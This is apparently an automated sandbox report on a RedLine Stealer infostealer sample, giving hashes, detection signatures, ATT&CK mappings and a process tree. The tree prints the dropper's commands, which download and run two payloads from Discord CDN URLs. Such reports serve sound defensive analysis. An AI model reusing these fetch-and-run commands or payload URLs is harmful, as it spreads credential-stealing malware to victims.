redline | 4643498111804354a0f93ac75944ea9e26b3809eb00183518f60de80c1f1054a

Analysis

max time kernel
117s
max time network
153s
platform
windows10_x64
resource
win10-en-20210920
submitted
21-10-2021 12:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4643498111804354a0f93ac75944ea9e26b3809eb00183518f60de80c1f1054a.exe
Size

449KB
MD5

ef55f7b6fd454379494cedc842bc0750
SHA1

cc1d6ce00149cb979425b897877f8cb78d193f1f
SHA256

4643498111804354a0f93ac75944ea9e26b3809eb00183518f60de80c1f1054a
SHA512

1361aeaa8d7f33b1372d07ea239ab442a657830b4d303c002964d2c2cc0fb029b43910974f25ad9f745f0dbf87a7cbfc427b096dd44989283f8ce36f4b864351

Score

10^/10

redline discovery infostealer spyware stealer suricata upx

Malware Config

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\2079\18.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\2079\18.exe	family_redline

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

extd.exeextd.exeextd.exe18.exeTransmissibility.exeextd.exe

pid process

4060 extd.exe
4392 extd.exe
4408 extd.exe
4444 18.exe
4424 Transmissibility.exe
4528 extd.exe

pid	process
4060	extd.exe
4392	extd.exe
4408	extd.exe
4444	18.exe
4424	Transmissibility.exe
4528	extd.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe	upx

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

18.exe

pid process

4444 18.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

18.exeTransmissibility.exe

description pid process

Token: SeDebugPrivilege 4444 18.exe
Token: SeDebugPrivilege 4424 Transmissibility.exe

pid	process
4444	18.exe

description	pid	process
Token: SeDebugPrivilege	4444	18.exe
Token: SeDebugPrivilege	4424	Transmissibility.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

4643498111804354a0f93ac75944ea9e26b3809eb00183518f60de80c1f1054a.execmd.exe

description	pid	process	target process
PID 768 wrote to memory of 2272	768	4643498111804354a0f93ac75944ea9e26b3809eb00183518f60de80c1f1054a.exe	cmd.exe
PID 768 wrote to memory of 2272	768	4643498111804354a0f93ac75944ea9e26b3809eb00183518f60de80c1f1054a.exe	cmd.exe
PID 2272 wrote to memory of 4060	2272	cmd.exe	extd.exe
PID 2272 wrote to memory of 4060	2272	cmd.exe	extd.exe
PID 2272 wrote to memory of 4392	2272	cmd.exe	extd.exe
PID 2272 wrote to memory of 4392	2272	cmd.exe	extd.exe
PID 2272 wrote to memory of 4408	2272	cmd.exe	extd.exe
PID 2272 wrote to memory of 4408	2272	cmd.exe	extd.exe
PID 2272 wrote to memory of 4444	2272	cmd.exe	18.exe
PID 2272 wrote to memory of 4444	2272	cmd.exe	18.exe
PID 2272 wrote to memory of 4444	2272	cmd.exe	18.exe
PID 2272 wrote to memory of 4424	2272	cmd.exe	Transmissibility.exe
PID 2272 wrote to memory of 4424	2272	cmd.exe	Transmissibility.exe
PID 2272 wrote to memory of 4528	2272	cmd.exe	extd.exe
PID 2272 wrote to memory of 4528	2272	cmd.exe	extd.exe

C:\Users\Admin\AppData\Local\Temp\4643498111804354a0f93ac75944ea9e26b3809eb00183518f60de80c1f1054a.exe
"C:\Users\Admin\AppData\Local\Temp\4643498111804354a0f93ac75944ea9e26b3809eb00183518f60de80c1f1054a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\EDCE.bat C:\Users\Admin\AppData\Local\Temp\4643498111804354a0f93ac75944ea9e26b3809eb00183518f60de80c1f1054a.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2272

C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4060

C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/900686571064414231/900686587866804244/18.exe" "18.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4392

C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/900686571064414231/900686616924925982/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4408

C:\Users\Admin\AppData\Local\Temp\2079\18.exe
18.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444

C:\Users\Admin\AppData\Local\Temp\2079\Transmissibility.exe
Transmissibility.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe "" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4528

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2079\18.exe
MD5
89c1c59884d9a165d14f8460d986226a

SHA1
47ba189fd5925b7ff162f7dab193fb52773ff77d

SHA256
fdb8321fe5919f80f19b679e4f918e707713cf52f734d0815e27a52f7cc19d50

SHA512
53c10412c50b43fc983843e1e3ac92d1be8b3676e3750a8860a5878eac433e109ce003ce05bdd9179b08171a7ba64689ca0d9d444d2cd230ece77794032c803e

Download Submit
C:\Users\Admin\AppData\Local\Temp\2079\18.exe
MD5
89c1c59884d9a165d14f8460d986226a

SHA1
47ba189fd5925b7ff162f7dab193fb52773ff77d

SHA256
fdb8321fe5919f80f19b679e4f918e707713cf52f734d0815e27a52f7cc19d50

SHA512
53c10412c50b43fc983843e1e3ac92d1be8b3676e3750a8860a5878eac433e109ce003ce05bdd9179b08171a7ba64689ca0d9d444d2cd230ece77794032c803e

Download Submit
C:\Users\Admin\AppData\Local\Temp\2079\Transmissibility.exe
MD5
ee7b54950381499d349cc3d50d2bdc0d

SHA1
bf39e0fa559e5b9d1a5b5aeefd6075bacf49799c

SHA256
622c21879b0776c3d01bb72cdd16bc83238d8464170871491d54367c4a295447

SHA512
86372cfcb5360cc1123bc1c15761489fc0c9c6616e30b8b34927b62a9aa69fe0e2838c07f72c7d0e569add2f7f6786efafe0698e000d099f122a64a5fe18b247

Download Submit
C:\Users\Admin\AppData\Local\Temp\2079\Transmissibility.exe
MD5
ee7b54950381499d349cc3d50d2bdc0d

SHA1
bf39e0fa559e5b9d1a5b5aeefd6075bacf49799c

SHA256
622c21879b0776c3d01bb72cdd16bc83238d8464170871491d54367c4a295447

SHA512
86372cfcb5360cc1123bc1c15761489fc0c9c6616e30b8b34927b62a9aa69fe0e2838c07f72c7d0e569add2f7f6786efafe0698e000d099f122a64a5fe18b247

Download Submit
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\EDCE.bat
MD5
80f23f432c0d1b21fc01081ca80379db

SHA1
239a11a14f3ecd4f318e1613c311fd8fffc3738b

SHA256
db61f732a86fdf9e461df8a3d53b1ca13a62fab9969e5001789bd6266739dfd5

SHA512
ef8265598523992738d1c667243a52d8731d1c6143d62624c8dfaf5532ea10d499af3ae4aace1760857eb238338ae4773b34e6899bb7dd0a336a0fe5ab640251

Download Submit
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\EDCC.tmp\EDCD.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
memory/2272-115-0x0000000000000000-mapping.dmp

Download
memory/4060-117-0x0000000000000000-mapping.dmp

Download
memory/4392-120-0x0000000000000000-mapping.dmp

Download
memory/4408-122-0x0000000000000000-mapping.dmp

Download
memory/4424-147-0x0000025CF5A15000-0x0000025CF5A17000-memory.dmp

Filesize
8KB

Download
memory/4424-146-0x0000025CF5A14000-0x0000025CF5A15000-memory.dmp

Filesize
4KB

Download
memory/4424-127-0x0000000000000000-mapping.dmp

Download
memory/4424-132-0x0000025CDB0E0000-0x0000025CDB0E1000-memory.dmp

Filesize
4KB

Download
memory/4424-159-0x0000025CF59B0000-0x0000025CF59B1000-memory.dmp

Filesize
4KB

Download
memory/4424-136-0x0000025CF5A20000-0x0000025CF5D4C000-memory.dmp

Filesize
3.2MB

Download
memory/4424-158-0x0000025CF91E0000-0x0000025CF91E1000-memory.dmp

Filesize
4KB

Download
memory/4424-157-0x0000025CF6F50000-0x0000025CF71AC000-memory.dmp

Filesize
2.4MB

Download
memory/4424-156-0x0000025CF89F0000-0x0000025CF8D10000-memory.dmp

Filesize
3.1MB

Download
memory/4424-140-0x0000025CF5A10000-0x0000025CF5A12000-memory.dmp

Filesize
8KB

Download
memory/4424-145-0x0000025CF5A12000-0x0000025CF5A14000-memory.dmp

Filesize
8KB

Download
memory/4444-139-0x0000000005E70000-0x0000000005E71000-memory.dmp

Filesize
4KB

Download
memory/4444-151-0x0000000005CF0000-0x0000000005CF1000-memory.dmp

Filesize
4KB

Download
memory/4444-144-0x00000000057F0000-0x00000000057F1000-memory.dmp

Filesize
4KB

Download
memory/4444-142-0x0000000005860000-0x0000000005861000-memory.dmp

Filesize
4KB

Download
memory/4444-141-0x0000000005720000-0x0000000005721000-memory.dmp

Filesize
4KB

Download
memory/4444-124-0x0000000000000000-mapping.dmp

Download
memory/4444-148-0x0000000006980000-0x0000000006981000-memory.dmp

Filesize
4KB

Download
memory/4444-149-0x0000000005C10000-0x0000000005C11000-memory.dmp

Filesize
4KB

Download
memory/4444-150-0x0000000005D30000-0x0000000005D31000-memory.dmp

Filesize
4KB

Download
memory/4444-143-0x0000000005780000-0x0000000005781000-memory.dmp

Filesize
4KB

Download
memory/4444-152-0x00000000064A0000-0x00000000064A1000-memory.dmp

Filesize
4KB

Download
memory/4444-153-0x0000000007190000-0x0000000007191000-memory.dmp

Filesize
4KB

Download
memory/4444-154-0x0000000007890000-0x0000000007891000-memory.dmp

Filesize
4KB

Download
memory/4444-155-0x0000000007360000-0x0000000007361000-memory.dmp

Filesize
4KB

Download
memory/4444-134-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/4444-138-0x0000000003110000-0x0000000003111000-memory.dmp

Filesize
4KB

Download
memory/4444-137-0x0000000005850000-0x0000000005851000-memory.dmp

Filesize
4KB

Download
memory/4528-130-0x0000000000000000-mapping.dmp

Download